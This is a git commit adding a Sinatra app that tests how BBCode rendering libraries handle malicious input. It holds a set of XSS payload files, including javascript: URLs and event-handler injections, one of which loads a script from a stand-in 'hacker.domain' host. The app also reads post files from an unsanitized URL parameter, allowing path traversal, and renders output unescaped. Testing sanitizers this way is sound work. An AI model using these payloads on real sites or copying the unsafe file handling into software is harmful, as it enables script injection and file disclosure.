bbcode exploit tester
commit
c67e390c31
@ -0,0 +1,7 @@
|
||||
source "http://rubygems.org"
|
||||
|
||||
gem "sinatra"
|
||||
gem "thin"
|
||||
gem "slim"
|
||||
gem "bb-ruby"
|
||||
gem "ruby-bbcode"
|
@ -0,0 +1,85 @@
|
||||
require 'sinatra'
|
||||
require 'slim'
|
||||
require 'digest/sha1'
|
||||
require 'bb-ruby'
|
||||
require 'ruby-bbcode'
|
||||
|
||||
@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
|
||||
|
||||
get '/' do
|
||||
@posts = list_posts
|
||||
@engines = @@engines
|
||||
slim :index
|
||||
end
|
||||
|
||||
def show_create_page(engine)
|
||||
get "/#{engine}" do
|
||||
slim :input
|
||||
end
|
||||
end
|
||||
|
||||
def get_post(engine)
|
||||
get "/#{engine}/:slug" do
|
||||
body = read_post params[:slug]
|
||||
@engine = 'bb-ruby'
|
||||
@slug = params[:slug]
|
||||
@other_engines = @@engines.select{|e| e != engine}
|
||||
@bbcode_output = exec_bbcode engine, body
|
||||
slim :output
|
||||
end
|
||||
end
|
||||
|
||||
def exec_bbcode(engine, body)
|
||||
case engine
|
||||
when "bb-ruby"
|
||||
BBRuby.to_html body
|
||||
when "ruby-bbcode"
|
||||
RubyBBCode.to_html body
|
||||
when "raw"
|
||||
body
|
||||
else
|
||||
raise "unknown engine: #{engine}"
|
||||
end
|
||||
end
|
||||
|
||||
def create_post(engine)
|
||||
post "/#{engine}" do
|
||||
slug = store_post request
|
||||
redirect to("#{engine}/#{slug}")
|
||||
end
|
||||
end
|
||||
|
||||
def setup_dir
|
||||
begin
|
||||
Dir.mkdir "posts"
|
||||
rescue
|
||||
end
|
||||
end
|
||||
|
||||
def slugify(title)
|
||||
title.downcase.strip.split(" ").join('-')
|
||||
end
|
||||
|
||||
def store_post(request)
|
||||
setup_dir
|
||||
title = slugify(request["slug"])
|
||||
comment = request["comment"]
|
||||
File.write "posts/#{title}", comment
|
||||
title
|
||||
end
|
||||
|
||||
def read_post(slug)
|
||||
file = File.open("posts/#{slug}", "r")
|
||||
file.read
|
||||
end
|
||||
|
||||
def list_posts
|
||||
Dir.entries("posts").select{|entry| entry != '.' && entry != '..'}
|
||||
end
|
||||
|
||||
@@engines.each do |engine|
|
||||
show_create_page engine
|
||||
get_post engine
|
||||
create_post engine
|
||||
end
|
||||
|
@ -0,0 +1,2 @@
|
||||
[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]
|
||||
|
@ -0,0 +1 @@
|
||||
[color=#ff0000;font-size:100px;]XSS[/color]
|
@ -0,0 +1 @@
|
||||
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
|
@ -0,0 +1,2 @@
|
||||
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
|
||||
|
@ -0,0 +1,2 @@
|
||||
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
|
||||
|
@ -0,0 +1 @@
|
||||
[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url]
|
@ -0,0 +1 @@
|
||||
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
|
@ -0,0 +1 @@
|
||||
[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube]
|
@ -0,0 +1 @@
|
||||
[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]
|
@ -0,0 +1,2 @@
|
||||
alert("This is an alert. You've been XSSed.");
|
||||
|
@ -0,0 +1,21 @@
|
||||
doctype html
|
||||
html
|
||||
head
|
||||
title pick an engine
|
||||
body
|
||||
#content
|
||||
h1 create a sploit
|
||||
ul
|
||||
- @@engines.each do |engine|
|
||||
li
|
||||
a href="#{engine}" = engine
|
||||
#existing
|
||||
h1 list sploits
|
||||
table
|
||||
- @posts.each do |post|
|
||||
tr
|
||||
td = post
|
||||
- @@engines.each do |engine|
|
||||
td
|
||||
a href="#{engine}/#{post}" view in #{engine}
|
||||
|
@ -0,0 +1,16 @@
|
||||
doctype html
|
||||
html
|
||||
head
|
||||
title pwn
|
||||
body
|
||||
h1 add your dope sploit
|
||||
form method='post' name='sploit'
|
||||
label for='slug' slug
|
||||
br
|
||||
input name='slug' type='text'
|
||||
br
|
||||
label for='comment' bbcode input
|
||||
br
|
||||
textarea name='comment' rows=10 cols=80
|
||||
br
|
||||
input type='submit'
|
@ -0,0 +1,13 @@
|
||||
doctype html
|
||||
html
|
||||
head
|
||||
title output
|
||||
body
|
||||
#content
|
||||
== @bbcode_output
|
||||
ul
|
||||
li
|
||||
a href="/#{@engine}" try again
|
||||
- @other_engines.each do |engine|
|
||||
li
|
||||
a href="/#{engine}/#{@slug}" view in #{engine}
|
Loading…
Reference in New Issue